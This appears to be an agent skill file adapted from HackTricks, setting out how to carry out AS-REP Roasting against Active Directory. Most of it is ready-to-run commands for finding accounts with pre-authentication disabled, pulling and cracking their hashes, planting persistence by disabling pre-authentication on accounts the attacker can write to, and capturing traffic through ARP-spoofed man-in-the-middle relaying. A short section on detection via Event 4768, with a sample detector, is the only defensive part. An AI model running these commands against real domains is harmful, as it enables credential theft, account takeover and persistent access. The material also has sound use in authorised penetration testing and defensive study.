Hacktricks-skills asreproast

How to perform AS-REP Roasting attacks against Active Directory users without Kerberos pre-authentication. Use this skill whenever the user mentions AS-REP, ASREPRoast, Kerberos pre-authentication, AD security testing, or wants to enumerate/crack users without pre-auth. This skill covers enumeration, attack execution, hash cracking, and persistence techniques.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/windows-hardening/active-directory-methodology/asreproast/SKILL.MD
source content

AS-REP Roasting

AS-REP Roasting targets user accounts that have the "Do not require Kerberos preauthentication" attribute set (DONT_REQ_PREAUTH). For such an account, the Domain Controller answers an AS-REQ without any proof of the password: the AS-REP it returns contains data encrypted with a key derived from the user's password, which can then be cracked offline.

Requirements

  • Target users without pre-authentication: the target accounts must have Kerberos pre-authentication disabled (DONT_REQ_PREAUTH set)
  • Connection to a Domain Controller: network access to send AS-REQs and receive the encrypted AS-REP
  • Optional domain account: having credentials allows efficient identification of vulnerable users via LDAP queries instead of guessing usernames

Workflow

1. Enumerate Vulnerable Users

If you have domain credentials, enumerate users without pre-authentication:

Windows (PowerView):

Get-DomainUser -PreauthNotRequired -verbose

Linux (bloodyAD):

bloodyAD -u user -p 'password' -d domain --host dc_ip get search \
  --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' \
  --attr sAMAccountName

Linux (Kerbrute - for user enumeration):

kerbrute userenum users.txt -d domain --dc dc.domain

2. Request AS-REP Hashes

Linux (Impacket GetNPUsers.py):

# Try all usernames from a file
python GetNPUsers.py domain/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast

# Use domain credentials to extract and target vulnerable users
python GetNPUsers.py domain/user:password -request -format hashcat -outputfile hashes.asreproast

Windows (Rubeus):

.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast /user:username

Windows (ASREPRoast.ps1):

Get-ASREPHash -Username VPN114user -verbose

Warning (detection): AS-REP Roasting with Rubeus generates Security Event ID 4768 (a Kerberos TGT was requested) on the DC with Ticket Encryption Type 0x17 (RC4-HMAC) and Pre-Authentication Type 0, which is the combination defenders alert on.
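As an added defender-side illustration of the event described in the warning above (not code from the original page or from any tool it lists), a small detector that flags 4768 records with etype 0x17 and pre-auth type 0; the key=value export format and the sample events are constructed assumptions:

```python
"""Flag Security Event 4768 records matching the AS-REP Roasting pattern.

Added example for this page, not code from HackTricks or any tool it lists.
Assumes 4768 events exported as space-separated key=value pairs (constructed
below); the field names follow the 4768 EventData schema.
"""
import re
from collections import defaultdict

# Constructed sample: one 4768 event per line. Only the second and third
# lines show the roast pattern (RC4 etype 0x17, PreAuthType 0, success).
SAMPLE_4768 = """\
EventID=4768 TargetUserName=alice TicketEncryptionType=0x12 PreAuthType=2 Status=0x0 IpAddress=10.0.0.21
EventID=4768 TargetUserName=svc_backup TicketEncryptionType=0x17 PreAuthType=0 Status=0x0 IpAddress=10.0.0.99
EventID=4768 TargetUserName=VPN114user TicketEncryptionType=0x17 PreAuthType=0 Status=0x0 IpAddress=10.0.0.99
EventID=4768 TargetUserName=ghost TicketEncryptionType=0x17 PreAuthType=0 Status=0x6 IpAddress=10.0.0.99
EventID=4768 TargetUserName=bob TicketEncryptionType=0x12 PreAuthType=2 Status=0x0 IpAddress=10.0.0.5
"""

RC4_ETYPE = 0x17     # etype 23, the type hashcat mode 18200 cracks
NO_PREAUTH = 0       # PreAuthType 0: no pre-authentication data in the AS-REQ

def parse_event(line):
    """Turn one key=value line into a dict (unknown keys are kept as-is)."""
    return dict(re.findall(r"(\w+)=(\S+)", line))

def is_asrep_roast(ev):
    """Successful TGT request with RC4 etype and no pre-authentication."""
    if ev.get("EventID") != "4768":
        return False
    return (int(ev.get("TicketEncryptionType", "0x0"), 16) == RC4_ETYPE
            and int(ev.get("PreAuthType", "-1")) == NO_PREAUTH
            and int(ev.get("Status", "0x1"), 16) == 0)   # failed requests return no enc-part

def find_asrep_roast(text):
    """Group flagged target accounts by requesting client address."""
    hits = defaultdict(list)
    for line in text.splitlines():
        ev = parse_event(line)
        if is_asrep_roast(ev):
            hits[ev["IpAddress"]].append(ev["TargetUserName"])
    return dict(hits)

if __name__ == "__main__":
    for ip, users in find_asrep_roast(SAMPLE_4768).items():
        print(f"{ip}: AS-REP without pre-auth for {len(users)} account(s): {', '.join(users)}")
```

Many distinct target accounts from one client address in a short window is the usual sign of a bulk roast against a user list rather than a single misconfigured logon.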

Linux (NetExec - quick one-liner):

# Pull AS-REP for a single user even with blank password
netexec ldap <dc> -u svc_scan -p '' --asreproast out.asreproast

3. Crack the Hashes

John the Ripper:

john --wordlist=passwords_kerb.txt hashes.asreproast

Hashcat:

hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt

Hashcat mode 18200 is "Kerberos 5, etype 23, AS-REP" (RC4-HMAC); recent hashcat versions can also auto-detect this mode from the $krb5asrep$23$ prefix when -m is omitted.

4. Persistence (If You Have GenericAll Permissions)

Set the DONT_REQ_PREAUTH flag (userAccountControl bit 4194304 / 0x400000) on a user object where you have write permission, so the account becomes roastable again later:

Windows (PowerView):

Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose

Linux (bloodyAD):

bloodyAD -u user -p 'password' -d domain --host dc_ip add uac -f DONT_REQ_PREAUTH 'target_user'

AS-REP Roasting Without Credentials

If you have a man-in-the-middle position, you can capture AS-REP packets as they traverse the network without relying on pre-authentication being disabled. This works for all users on the VLAN.

ASRepCatcher:

# Act as proxy between clients and DC, forcing RC4 downgrade if supported
ASRepCatcher relay -dc $DC_IP

# Disable ARP spoofing (MITM position obtained differently)
ASRepCatcher relay -dc $DC_IP --disable-spoofing

# Passive listening of AS-REP packets, no packet alteration
ASRepCatcher listen

Quick Reference

Task                      Command
Enumerate (Windows)       Get-DomainUser -PreauthNotRequired
Enumerate (Linux)         bloodyAD ... get search --filter '...4194304...'
Request hashes (Linux)    GetNPUsers.py domain/ -usersfile users.txt -format hashcat
Request hashes (Windows)  Rubeus.exe asreproast /format:hashcat
Crack (John)              john --wordlist=rockyou.txt hashes.asreproast
Crack (Hashcat)           hashcat -m 18200 hashes.asreproast rockyou.txt
Persistence (Windows)     Set-DomainObject -XOR @{useraccountcontrol=4194304}
Persistence (Linux)       bloodyAD ... add uac -f DONT_REQ_PREAUTH

Tools Required

  • Impacket (GetNPUsers.py) - Python-based Kerberos tools
  • Rubeus - .NET Kerberos tool for Windows
  • PowerView - PowerShell AD reconnaissance
  • Hashcat or John the Ripper - Password cracking
  • bloodyAD - Linux AD management tool
  • ASRepCatcher - MITM AS-REP capture
